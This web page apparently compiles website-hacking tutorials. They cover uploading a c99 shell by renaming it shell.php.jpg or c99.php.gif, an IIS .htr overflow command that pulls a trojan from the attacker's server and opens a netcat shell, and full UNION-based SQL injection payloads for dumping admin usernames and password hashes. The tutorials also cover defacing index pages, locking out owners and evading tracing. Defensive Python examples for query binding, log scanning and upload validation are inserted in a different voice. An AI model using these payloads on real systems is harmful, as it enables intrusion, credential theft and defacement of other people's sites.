
Hack Website By Uploading Shell – Tutorial


Google Dork : intitle:Powered By phUploader 

Go to Google.com, enter this dork and look at the search results.
Exploit URL :
http://{site.com}/path/upload.php
or 
http://site.com/upload.php

Select any website and upload your file there.
The website allows only .jpg, .png and .gif files to be uploaded.
You can still upload your deface page as a .jpg, and mirror websites like
zone-h accept it as a defacement; if you want to upload a shell, upload it as
shell.php.jpg

After uploading your file you'll get the message
Your file(s) have been uploaded!


See the example link below this message to view your uploaded file.

Live Demo ~ http://Victimsite.com/phUploader.php

Uploaded File ~ http://www.Victimsite.com/uploads/1321616908.jpg


How To Upload Shell and Deface Website – Tutorial

What we need:

1- A Shell (Will be provided)
2- A website vulnerable to SQLi
3- Image or File upload area on that Vulnerable website

So firstly download the shell here.


What is a Shell?

A shell script is a script written for the shell, or command line interpreter, of an operating system. It is often considered a simple domain-specific programming language. Typical operations performed by shell scripts include file manipulation, program execution, and printing text.
This is a plain c99 shell, BUT it is undetected, so you should not get a warning from an antivirus if you download it. (Update: not undetected anymore.)

I am not going to explain SQLi just how to deface.

Sql Tut- http://sumitcrackzone.blogspot.in/2012/08/how-to-hack-website-with-sql-injection.html

So now go get yourself a vulnerable site, hack it, get the admin login details and get the admin page address.

Now log in to the admin page with the admin details you got.

Go through the admin page until you find a place where you can upload a picture (usually a picture).

Now you have to upload the shell. If you don't get an error, it is all good.

Now to find the shell

Go through the site until you find any image; if you are using Firefox, right-click on it and choose “Copy Image Location”.

Make a new tab and paste it there.

It will probably look something like this:

http://www.example.com/images/photonamehere.jpg

So now that we know that, change “/photonamehere.jpg” to “/c99ud.php.jpg” (without quotes).

Now a page will come up looking like this:


It probably does not look exactly like that, but it will look similar.

Now you have access to all the files on the site.
What you want to do now is
find index.php, or whatever the main page is, and replace it with your HTML code for your deface page.

Then you can either delete all the other files OR (and I recommend this) let it redirect to the main page.

Keep in mind:

• Change the admin username and password
• The people have FTP access, so you need to change that password too.
• Always use a proxy or VPN

How To Hack Web Servers - tutorial


Hacking Tool: IISHack.exe

iishack.exe overflows a buffer used by the IIS HTTP daemon, allowing arbitrary code to be executed.
c:\>iishack www.yourtarget.com 80 www.yourserver.com/thetrojan.exe
www.yourtarget.com is the IIS server you're hacking, 80 is the port it's listening on, www.yourserver.com is some web server with your trojan or custom script (your own, or another), and /thetrojan.exe is the path to that script.

"IIS Hack" is a buffer overflow vulnerability exposed by the way IIS handles requests with .HTR extensions.
A hacker sends a long URL that ends with ".HTR". IIS interprets it as a file type of HTR and invokes ISM.DLL to handle the request.

Since ISM.DLL is vulnerable to a buffer overflow, a carefully crafted string can be executed in the security context of IIS, which is privileged. For example, it is relatively simple to include in the exploit code a sequence of commands that will open a TCP/IP connection, download an executable and then execute it. This way, any malicious code can be executed.

A sample exploit can be constructed as shown below:
To hack the target site, an attacker's system running a web server can use iishack.exe and ncx.exe. To begin with, ncx.exe is configured to run from the root directory. IIShack.exe is then run against the victim site.
c:\>iishack.exe  80 /ncx.exe
The attacker can then use netcat to invoke the command shell:
c:\>nc  80
He can proceed to upload and execute any code of his choice and maintain a backdoor on the target site.


IPP Buffer Overflow Countermeasures

• Install the latest service pack from Microsoft.
• Remove IPP printing from the IIS server.
• Install a firewall and remove unused extensions.
• Implement aggressive network egress filtering.
• Use the IISLockdown and URLScan utilities.
• Regularly scan your network for vulnerable servers.

Without any further explanation, the first countermeasure is obviously to install the latest service packs and hotfixes. As with many IIS vulnerabilities, the IPP exploit takes advantage of a bug in an ISAPI DLL that ships with IIS 5 and is configured by default to handle requests for certain file types. This particular ISAPI filter resides in C:\WINNT\System32\msw3prt.dll and provides Windows 2000 with support for IPP. If this functionality is not required on the web server, the application mapping for this DLL to .printer files can be removed (optionally deleting the DLL itself) in order to prevent the buffer overflow from being exploited. This works because the DLL will then not be loaded into the IIS process when it starts up. In fact, most security issues are centered on the ISAPI DLL mappings, making this one of the most important countermeasures to adopt when securing IIS.

Another standard countermeasure is to use a firewall and remove any extensions that are not required. Implementing aggressive network egress filtering can help to a certain degree. With IIS, using IISLockdown and URLScan (free utilities from Microsoft) can ensure more protection and minimize damage in case the web server is affected. Microsoft has also released a patch for the buffer overflow, but removing the ISAPI DLL is a more proactive solution in case there are additional vulnerabilities that are yet to be found in the code.


ISAPI DLL Source disclosures

Microsoft IIS 4.0 and 5.0 can be made to disclose fragments of source code which should otherwise be inaccessible. This is done by appending "+.htr" to a request for a known .asp (or .asa, .ini, etc.) file. Appending this string causes the request to be handled by ISM.DLL, which then strips the '+.htr' string and may disclose part or all of the source of the .asp file specified in the request.

IIS supports several file types that require server-side processing. When a web site visitor requests a file of one of these types, an appropriate filter DLL processes it. The vulnerability exists in ISM.DLL, the filter DLL that processes .HTR files. HTR files enable remote administration of user passwords: they are scripts that allow Windows NT password services to be provided via IIS web servers. Windows NT users can use .HTR scripts to change their own passwords, and administrators can use them to perform a wide array of password administration functions.

HTR is a first-generation advanced scripting technology that is included in IIS 3.0 and still supported by later versions of IIS for backwards compatibility. However, HTR was never widely adopted, and was superseded by Active Server Pages (ASP) technology introduced in IIS 4.0.

Attack Methods

Exploit / Attack Methodology

By making a specially formed request to IIS, with the name of the file and then appending around 230 + " %20 " (these represent spaces) and then appending " .htr ", this tricks IIS into thinking that the client is requesting a " .htr " file. The .htr file extension is mapped to the ISM.DLL ISAPI application and IIS redirects all requests for .htr resources to this DLL.

ISM.DLL is then passed the name of the file to open and execute, but before doing this ISM.DLL truncates the buffer sent to it, chopping off the .htr and a few spaces, and ends up opening the file whose source is sought. The contents are then returned. This attack can only be launched once though, unless the web service is started and stopped: it will only work when ISM.DLL is first loaded into memory.

"Undelimited .HTR Request" vulnerability: The first vulnerability is a denial of service vulnerability. All .HTR files accept certain parameters that are expected to be delimited in a particular way. This vulnerability exists because the search routine for the delimiter isn't properly bounded. Thus, if a malicious user provided a request without the expected delimiter, the ISAPI filter that processes it would search forever for the delimiter and never find it.

If a malicious user submitted a password change request that lacked an expected delimiter, ISM.DLL, the ISAPI extension that processes .HTR files, would search endlessly for it. This would prevent the server from servicing any more password change requests. In addition, the search would consume CPU time, so the overall response of the server might be slowed.

The second threat would be more difficult to exploit. A carefully constructed file request could cause arbitrary code to execute on the server via a classic buffer overrun technique. Neither scenario could occur accidentally. This vulnerability does not involve the functionality of the password administration features of .HTR files.

".HTR File Fragment Reading" vulnerability: The ".HTR File Fragment Reading" vulnerability could allow fragments of certain types of files to be read by providing a malformed request that would cause the. HTR processing to be applied to them. This vulnerability could allow a malicious user to read certain types of files under some very restrictive circumstances by levying a bogus .HTR request. The ISAPI filter will attempt to interpret the requested file as an .HTR file, and this would have the effect of removing virtually everything but text from a selected file. That is, it would have the effect of stripping out the very information that is most likely to contain sensitive information in .asp and other server-side files.

The .htr vulnerability will allow data to be added, deleted or changed on the server, or allow any administrative control on the server to be usurped. Although .HTR files are used to allow web-based password administration, this vulnerability does not involve any weakness in password handling.
"Absent Directory Browser Argument" vulnerability: Among the default HTR scripts provided in IIS 3.0 (and preserved on upgrade to IIS 4.0 and IIS 5.0) were several that allowed web site administrators to view directories on the server. One of these scripts, if called without an expected argument, will enter an infinite loop that can consume all of the system's CPU availability, thereby preventing the server from responding to requests for service.

How To Hack website With SQL Injection : Full Tutorial

I'm posting this here because this tutorial explains everything step by step, but most of the SQL tutorials end when we find the password hash, so newbies don't know what to do after that. In this tutorial I'm going to explain how to deface a website from scratch; I hope you will find this useful.

If you find this tutorial useful please post a comment.

1) FINDING THE TARGET AND GETTING THE ADMIN PASSWORD

First we must find our target website; to do that you can use these "dorks".
I'll give some dorks here: copy any one of them, paste it in Google and search.
Code:
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=

You can find lots of dorks here. (Use them without the " " marks.)

1). Check for vulnerability

Let's say that we have some site like this

http://www.site.com/news.php?id=5

Now, to test if it is vulnerable, we add a ' (quote) to the end of the url,

and that would be http://www.site.com/news.php?id=5'

so if we get some error like
"You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right etc..."
or something similar,

that means it is vulnerable to sql injection
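The quote test in this step only works because the page pastes the id parameter straight into its SQL text and echoes the database's error back to the browser. The Python below is an added example, not code from this tutorial: it reproduces that pattern against a constructed in-memory SQLite table and shows the fix a developer should ship, integer validation plus a bound parameter, under which the quote probe, the ORDER BY count and the UNION SELECT from this tutorial all get the same non-answer. The function names and sample rows are my own.

```python
import sqlite3

def make_db():
    """Constructed sample data standing in for the tutorial's news table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany("INSERT INTO news VALUES (?, ?)",
                     [(5, "Fifth story"), (6, "Sixth story")])
    return conn

def vulnerable_lookup(conn, id_param):
    """What news.php?id= does on a vulnerable site: the raw parameter is glued
    into the SQL text, so a quote in it changes the statement's syntax."""
    sql = "SELECT id, title FROM news WHERE id = " + id_param
    return conn.execute(sql).fetchall()

def probe_error(conn, id_param):
    """The database error text the vulnerable page echoes back (the tutorial's
    'You have an error in your SQL syntax' oracle), or None if the query ran."""
    try:
        vulnerable_lookup(conn, id_param)
        return None
    except sqlite3.Error as exc:
        return str(exc)

def safe_lookup(conn, id_param):
    """The fix: validate the type, then bind the value as a parameter. The
    parameter is never parsed as SQL, so the quote test, the ORDER BY count and
    the UNION SELECT all collapse into the same answer: None (send 400)."""
    try:
        news_id = int(id_param)
    except ValueError:
        return None
    return conn.execute("SELECT id, title FROM news WHERE id = ?",
                        (news_id,)).fetchall()

if __name__ == "__main__":
    db = make_db()
    print("normal:", safe_lookup(db, "5"))
    print("quote probe, vulnerable page leaks:", probe_error(db, "5'"))
    print("quote probe, fixed page returns:", safe_lookup(db, "5'"))
```

Two things follow from the example. Binding the parameter is the real fix; rejecting non-integers early is a bonus that turns every probe into a 400 before the database is even asked. Independently of that, database error text should go to the server log, never to the client, because that echoed error is the confirmation this step relies on.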

2). Find the number of columns

To find the number of columns we use the statement ORDER BY (it tells the database how to order the result).

So how do we use it? Just increment the number until we get an error.

http://www.site.com/news.php?id=5 order by 1/* <-- no error
http://www.site.com/news.php?id=5 order by 2/* <-- no error
http://www.site.com/news.php?id=5 order by 3/* <-- no error
http://www.site.com/news.php?id=5 order by 4/* <-- error (we get a message like Unknown column '4' in 'order clause' or something like that)

That means it has 3 columns, because we got an error on 4.

3). Check for UNION function

With UNION we can select more data in one sql statement.
So we have
http://www.site.com/news.php?id=5 union all select 1,2,3/* (we already found in section 2 that the number of columns is 3)

If we see some numbers on the screen, i.e. 1 or 2 or 3, then the UNION works.

4). Check for MySQL version

http://www.site.com/news.php?id=5 union all select 1,2,3/* NOTE: if /* is not working or you get some error, then try --
It's a comment and it's important for our query to work properly.

Let's say that we have number 2 on the screen; now to check the version we replace the number 2 with @@version or version() and get something like 4.1.33-log or 5.0.45 or similar.

it should look like this
http://www.site.com/news.php?id=5 union all select 1,@@version,3/*

If you get an error "union + illegal mix of collations (IMPLICIT + COERCIBLE) ..."

I didn't see any paper covering this problem, so I must write it.

What we need is the convert() function

i.e.

 http://www.site.com/news.php?id=5 union all select 1,convert(@@version using latin1),3/*

or with hex() and unhex()

 i.e.

http://www.site.com/news.php?id=5 union all select 1,unhex(hex(@@version)),3/*

and you will get MySQL version

5). Getting table and column name
Well, if the MySQL version is < 5 (i.e. 4.1.33, 4.1.12...) <--- later I will describe MySQL > 5 versions.
We must guess the table and column name in most cases.

Common table names are: user/s, admin/s, member/s ...

Common column names are: username, user, usr, user_name, password, pass, passwd, pwd etc...

i.e. that would be

http://www.site.com/news.php?id=5 union all select 1,2,3 from admin/* (we see number 2 on the screen like before, and that's good)

We know that table admin exists...


Now to check column names.

http://www.site.com/news.php?id=5 union all select 1,username,3 from admin/* (if you get an error, then try another column name)

We get the username displayed on screen; an example would be admin, or superadmin etc...

Now to check if the column password exists

http://www.site.com/news.php?id=5 union all select 1,password,3 from admin/* (if you get an error, then try another column name)

We see the password on the screen as a hash or plain text; it depends on how the database is set up,

i.e. md5 hash, mysql hash, sha1...

Now we must complete the query to look nice.

For that we can use the concat() function (it joins strings)

i.e.

http://www.site.com/news.php?id=5 union all select 1,concat(username,0x3a,password),3 from admin/*

Note that I put 0x3a: it's the hex value for : (so 0x3a is the hex value for a colon).

(There is another way for that, char(58), the ascii value for :)

http://www.site.com/news.php?id=5 union all select 1,concat(username,char(58),password),3 from admin/*

Now we get username:password displayed on screen, i.e. admin:admin or admin:somehash

When you have this, you can log in as admin or some superuser.

If you can't guess the right table name, you can always try mysql.user (default).

It has user and password columns, so an example would be

http://www.site.com/news.php?id=5 union all select 1,concat(user,0x3a,password),3 from mysql.user/*

6). MySQL 5

Like I said before, I'm going to explain how to get table and column names in MySQL > 5.

For this we need information_schema. It holds all tables and columns in the database.

To get tables we use table_name and information_schema.tables.

i.e

http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables/*

Here we replace our number 2 with table_name to get the first table from information_schema.tables displayed on the screen. Now we must add LIMIT to the end of the query to list out all tables.

i.e

http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 0,1/*

Note that I put 0,1 (get 1 result starting from the 0th).

now to view the second table, we change limit 0,1 to limit 1,1

i.e

http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 1,1/*

the second table is displayed.

for third table we put limit 2,1

i.e

http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 2,1/*

Keep incrementing until you get something useful like db_admin, poll_user, auth, auth_user etc...

To get the column names the method is the same.

Here we use column_name and information_schema.columns, so an example would be

http://www.site.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns limit 0,1/*

The first column is displayed.

The second one (we change limit 0,1 to limit 1,1)

i.e.


http://www.site.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns limit 1,1/*

The second column is displayed, so keep incrementing until you get something like

username, user, login, password, pass, passwd etc...

If you want to display column names for a specific table, use this query (where clause).

Let's say that we found table users.

i.e

http://www.site.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns where table_name='users'/*

Now we get the column names in table users displayed. Just using LIMIT we can list all columns in table users.

Note that this won't work if magic quotes is ON.

Let's say that we found columns user, pass and email.

Now to complete the query and put them all together,

for that we use concat(), which I described earlier.

i.e


http://www.site.com/news.php?id=5 union all select 1,concat(user,0x3a,pass,0x3a,email) from users/*

what we get here is user:pass:email from table users.

example: admin:hash:whatever@blabla.com
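From the defender's side, every step above (the quote, the ORDER BY count, the UNION SELECT with @@version or information_schema, the trailing /* comment) leaves a distinctive line in the web server's access log, and so do the "+.htr", "%20...%20.htr" and ".printer" requests from the IIS sections earlier on this page. The Python scanner below is an added example and not the tutorial's code; the log lines, addresses, paths and rule names are constructed for it. It URL-decodes the request target, matches a small set of patterns, treats a lone quote as interesting only when the server answered with a 5xx (the error the tutorial's first step is hunting for), and groups hits by client address.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access log (common log format); addresses and paths are made up.
SAMPLE_LOG = """\
10.0.0.1 - - [12/Nov/2011:10:00:01 +0000] "GET /news.php?id=5 HTTP/1.1" 200 5120
10.0.0.2 - - [12/Nov/2011:10:00:02 +0000] "GET /news.php?id=5' HTTP/1.1" 500 612
10.0.0.2 - - [12/Nov/2011:10:00:03 +0000] "GET /news.php?id=5%20order%20by%204/* HTTP/1.1" 500 640
10.0.0.2 - - [12/Nov/2011:10:00:04 +0000] "GET /news.php?id=5%20union%20all%20select%201,@@version,3/* HTTP/1.1" 200 5200
10.0.0.2 - - [12/Nov/2011:10:00:05 +0000] "GET /news.php?id=5%20union%20all%20select%201,table_name,3%20from%20information_schema.tables%20limit%200,1/* HTTP/1.1" 200 5200
10.0.0.3 - - [12/Nov/2011:10:00:06 +0000] "GET /default.asp+.htr HTTP/1.0" 200 2048
10.0.0.3 - - [12/Nov/2011:10:00:07 +0000] "GET /default.asp%20%20%20%20%20%20%20%20.htr HTTP/1.0" 200 2048
10.0.0.3 - - [12/Nov/2011:10:00:08 +0000] "GET /NULL.printer HTTP/1.0" 500 0
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>\S+)" (?P<status>\d{3}) (?P<size>\S+)'
)

# Each rule is (name, regex applied to the URL-decoded request target).
SQLI_RULES = [
    ("sqli-order-by", re.compile(r"\border\s+by\s+\d+", re.I)),
    ("sqli-union-select", re.compile(r"\bunion\b(\s+all)?\s+select\b", re.I)),
    ("sqli-schema-enum", re.compile(r"information_schema\.|@@version|\bversion\(\)|\bmysql\.user\b", re.I)),
    ("sqli-comment-tail", re.compile(r"(/\*|--)\s*$")),
]
IIS_RULES = [
    # "+.htr" and "%20...%20.htr" both decode to "<name>.<ext> <spaces> .htr"
    ("iis-htr-append", re.compile(r"\.\w+\s+\.htr$", re.I)),
    ("iis-printer-ext", re.compile(r"\.printer$", re.I)),
]

def parse_line(line):
    """Parse one common-log-format line into ip, decoded target and status, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {"ip": m["ip"], "target": unquote_plus(m["target"]), "status": int(m["status"])}

def classify(entry):
    """Return the list of rule names the entry triggers."""
    target, status = entry["target"], entry["status"]
    hits = [name for name, rx in SQLI_RULES + IIS_RULES if rx.search(target)]
    # A quote in a query string is common in benign traffic (names, search terms),
    # so alert on it only when the server answered with an error: that pairing is
    # exactly the confirmation the tutorial's first step looks for.
    query = target.split("?", 1)[1] if "?" in target else ""
    if "'" in query and status >= 500:
        hits.append("sqli-quote-error")
    return hits

def scan_log(text):
    """Map each client address to the sorted set of rules it triggered."""
    findings = {}
    for line in text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        for name in classify(entry):
            findings.setdefault(entry["ip"], set()).add(name)
    return {ip: sorted(names) for ip, names in findings.items()}

if __name__ == "__main__":
    for ip, names in scan_log(SAMPLE_LOG).items():
        print(ip, ", ".join(names))
```

Grouping by address matters more than any single pattern: one ORDER BY in a day is noise, while a quote-plus-5xx followed by ORDER BY, UNION SELECT and information_schema from the same client within minutes is the whole procedure above, and that sequence is what to alert on. The IIS rules are only useful on servers that still have the .htr and .printer mappings; removing those mappings, as the countermeasures section describes, makes the requests harmless and the rules merely informational.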

** If you are too lazy to do the above stuff you can use tools; they will do all the job:
1) Exploit scanner (this will find vulnerable websites)
2) SQLi helper (this tool will do all the injecting job and get you the pass or hash)

*** Use the tools only if you are new to hacking. Do it manually; that's the thrill and that is real hacking. When you do it manually you will understand the concept.

In some websites you can directly see the password, but most websites encrypt them using MD5, so you have to crack the hash to get the password. To crack the password there are three ways:
1) check on the net whether this hash has been cracked before
2) crack the password with the help of a site
3) use MD5 cracking software
Password = OwlsNest

2) DEFACING THE WEBSITE

After getting the password you can log in as the admin of the site. But first you have to find the admin login page for the site. There are three methods to find the admin panel.
1) you can use an admin finder website
2) you can use admin finder software

After logging in as the admin you can upload photos to the site, so now you are going to upload a shell into the site using this upload facility.

Download the shell here (shells are php scripts which affect websites, so they will be detected as trojans, but no need to worry, I take the responsibility):

Extract it and you will get a c99.php; upload it.
Some sites won't allow you to upload a php file, so rename it as c99.php.gif
and then upload it.

After that go to http://www.site.com/images (in most sites images are saved in this dir, but if you can't find c99 there then you have to guess the dir).
Find the c99.php;.gif and click it.
Now you can see a big control panel.
Now you can do whatever you want to do.
Search for the index.html file and replace it with your own file, so if anyone goes to that site they will see your page.

After doing this click logout. That's it, you are done.
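Both upload tricks on this page (shell.php.jpg in the phUploader section at the top, and c99.php.gif / c99.php;.gif here) defeat an upload filter that only looks at how the client-supplied file name ends. The Python below is an added example, not code from this page or from any of the tools it links: a check_upload() routine of my own that rejects multi-dot and meta-character names outright instead of cleaning them, checks the extension against an allowlist, sniffs the leading bytes of the claimed image type, and discards the client's name in favour of a random one with the verified extension. The magic-byte table, function names and rejection rules are my assumptions.

```python
import os
import re
import secrets

# Allowed image types and the leading bytes each must start with (assumed table).
MAGIC = {
    "jpg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
}
ALLOWED_EXT = {"jpg": "jpg", "jpeg": "jpg", "png": "png", "gif": "gif"}

# Exactly one dot, a short alphanumeric stem and extension, nothing else. Anything
# fancier (shell.php.jpg, c99.php;.gif, ../x.png) is rejected rather than cleaned,
# so no server-side handler can ever be chosen by a part of the name we ignored.
NAME_RE = re.compile(r"[A-Za-z0-9_-]{1,64}\.[A-Za-z0-9]{1,5}")

class UploadRejected(ValueError):
    pass

def check_upload(filename, data):
    """Validate an upload; return (storage_name, kind) or raise UploadRejected."""
    if not NAME_RE.fullmatch(filename):
        raise UploadRejected("unacceptable file name: %r" % filename)
    ext = filename.rsplit(".", 1)[1].lower()
    kind = ALLOWED_EXT.get(ext)
    if kind is None:
        raise UploadRejected("extension not allowed: %r" % ext)
    # The bytes must actually begin like the image type the name claims.
    if not any(data.startswith(sig) for sig in MAGIC[kind]):
        raise UploadRejected("content is not a %s image" % kind)
    # Discard the client's name: store under a random name with the verified
    # extension, so the stored path can never pick up a script handler.
    return secrets.token_hex(16) + "." + kind, kind

def accepts(filename, data):
    """True if check_upload would accept the file (convenience for callers and tests)."""
    try:
        check_upload(filename, data)
        return True
    except UploadRejected:
        return False

def store_upload(filename, data, upload_root):
    """Write a validated upload under upload_root, a directory that should sit
    outside the web root (or be served with script execution disabled)."""
    storage_name, _ = check_upload(filename, data)
    path = os.path.join(upload_root, storage_name)
    with open(path, "wb") as fh:
        fh.write(data)
    return path

if __name__ == "__main__":
    for name, body in [("photo.jpg", b"\xff\xd8\xff\xe0"), ("shell.php.jpg", b"\xff\xd8\xff\xe0"),
                       ("c99.php;.gif", b"GIF89a"), ("logo.gif", b"<?php echo 1;")]:
        print("%-16s %s" % (name, "accepted" if accepts(name, body) else "rejected"))
```

The order of the controls is deliberate. Sniffing the leading bytes alone is not sufficient, because a file can begin with a valid image header and still carry script further in; what actually prevents execution is that the stored name is generated by the server with an image extension and that the upload directory is not executable. The sniff is there to keep junk out and to make the stored extension truthful, not to stand in for those two controls.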